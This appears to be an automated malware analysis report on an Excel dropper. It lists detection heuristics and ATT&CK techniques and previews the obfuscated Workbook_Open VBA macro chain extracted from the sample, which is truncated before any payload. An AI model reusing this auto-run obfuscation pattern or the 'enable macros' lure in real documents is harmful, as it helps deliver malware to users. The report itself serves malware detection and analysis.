Verdict: MALICIOUS
Risk Score: 208
Malware Insights
MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is an Excel file containing a Workbook_Open VBA macro that calls the Shell() function, indicating that it is designed to execute external commands as soon as the workbook is opened. The document body explicitly prompts the user to 'enable macros for proper view!', a common social engineering tactic. The VBA code is heavily obfuscated, but the presence of Shell() together with the lure strongly suggests that it acts as a downloader for a second-stage payload.
Heuristics (6)
- ClamAV: Xls.Malware.Valyria-10036514-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]
- Workbook_Open macro [high, OLE_VBA_WBOPEN]
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 103999 bytes | 872bbb859d8e808568d0241913f3cc374415f64cf972e66c7d99a2e49c62dd56 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRkboOK_opeN(): Call HjQtJEpdADlaPJh: End Sub
Function HjQtJEpdADlaPJh() As Currency
Call fAoPHggxuVQpqfE
End Function
Private Function fAoPHggxuVQpqfE() As Long
Call hxXtPeuinsXPNfn
End Function
Private Sub hxXtPeuinsXPNfn()
Call UbntGrmagISFqyD
End Sub
Static Function UbntGrmagISFqyD() As Boolean
Call lmOAHaCjacpGQvf
End Function
Function lmOAHaCjacpGQvf() As Integer
Call MnFxiABbJyqUIfW
End Function
Private Function MnFxiABbJyqUIfW() As Currency
Call sLZicUTHDPdxkZq
End Function
Private Function sLZicUTHDPdxkZq() As Boolean
Call iZJJweUXmivlfGZ
End Function
Static Function iZJJweUXmivlfGZ() As Single
Call PpNIFwQpACtnQid
End Function
Sub PpNIFwQpACtnQid()
Call GwgwoFvqEWWBUvw
End Sub
Private Sub GwgwoFvqEWWBUvw()
Call oETIMXVunqfcODk
End Sub
Static Function oETIMXVunqfcODk() As Currency
Call vXfZnQBTrJYSVPv
End Function
Sub vXfZnQBTrJYSVPv()
Call fXCzZhGJvesSXDS
End Sub
Sub fXCzZhGJvesSXDS()
Call mjxeQZQUUywgnvO
End Sub
Private Function mjxeQZQUUywgnvO() As Single
Call UnulpRzGhnGuHKK
End Function
Static Function UnulpRzGhnGuHKK() As Date
Call HuXlsfCJBhZOgVo
End Function
Sub HuXlsfCJBhZOgVo()
Call BIxzskfXUbAwGFN
End Sub
Function BIxzskfXUbAwGFN() As Date
Call WSOvZPYfyVhrLFf
End Function
Private Sub WSOvZPYfyVhrLFf()
Call zjcFCmrycNVARds
End Sub
Static Function zjcFCmrycNVARds() As String
Call CvhxNjZKRHQVBSy
End Function
Sub CvhxNjZKRHQVBSy()
Call NOjCUYiiFASEmgz
End Sub
Sub NOjCUYiiFASEmgz()
Call zddpImHzDtazCKt
End Sub
Private Function zddpImHzDtazCKt() As Variant
Call eeKaPHiqXolGawa
End Function
Static Sub eeKaPHiqXolGawa()
Call ywrIhnxLghGbWQI
End Sub
Sub ywrIhnxLghGbWQI()
Call ZUVFwMmtpZjLTIm
End Sub
Sub ZUVFwMmtpZjLTIm()
Call NTiTOYTheUOEBzz
End Sub
Private Sub NTiTOYTheUOEBzz()
Call XuALGOyTxLFOdgR
End Sub
Static Sub XuALGOyTxLFOdgR()
Call twBUCsUMwHwirNS
End Sub
Sub twBUCsUMwHwirNS()
Call XFzsuOSRvBwQFSP
End Sub
Function XFzsuOSRvBwQFSP()
Call qfxNxvCBjsGMsFN
End Function
Static Function qfxNxvCBjsGMsFN() As Variant
Call CqigTjpLsmUUnzy
End Function
Sub CqigTjpLsmUUnzy()
Call pxLgWwsOLhnoMKc
End Sub
Sub pxLgWwsOLhnoMKc()
Call jLlvWCVcfaOXmuB
End Sub
Function jLlvWCVcfaOXmuB() As Double
Call FVCrDhOjJUuRquT
End Function
Static Sub FVCrDhOjJUuRquT()
Call hlQBgEhDnNjawSg
End Sub
Static Function hlQBgEhDnNjawSg() As Object
Call lyVsqBPPbHdvhIm
End Function
Function lyVsqBPPbHdvhIm() As Long
Call vRXyxqYnPzfeSVo
End Function
Private Sub vRXyxqYnPzfeSVo()
Call hgRlmExEOsnZiAh
End Sub
Private Function hgRlmExEOsnZiAh() As Object
Call MhyWtZYuhoygGmO
End Function
Static Function MhyWtZYuhoygGmO() As Double
Call gyfELFnQqgUCBFw
End Function
Sub gyfELFnQqgUCBFw()
Call uCAlwsEMVcsjFgR
End Sub
Private Function uCAlwsEMVcsjFgR() As Double
Call wWWOrqImoUbfgon
End Function
Private Sub wWWOrqImoUbfgon()
Call rcgrGuQmcPNmPFw
End Sub
Static Sub rcgrGuQmcPNmPFw()
Call czpQfKKRGGKIWCG
End Sub
Static Sub czpQfKKRGGKIWCG()
Call GInoXgIWFBKqlHD
End Sub
Private Function GInoXgIWFBKqlHD() As Single
Call YhlIbNsGtsUmYuB
End Function
Private Function YhlIbNsGtsUmYuB() As Single
Call ksWcxBfQCmhuSpn
End Function
Static Sub ksWcxBfQCmhuSpn()
Call XAzcAOiSWgAPrzQ
End Sub
Function XAzcAOiSWgAPrzQ() As Integer
Call SNZrzULhpabxRjp
End Function
Private Sub SNZrzULhpabxRjp()
Call nXqmgzDoTUIsWjH
End Sub
Private Sub nXqmgzDoTUIsWjH()
Call ypkhsNUfEXOnTXA
End Sub
Private Sub yp
... (truncated)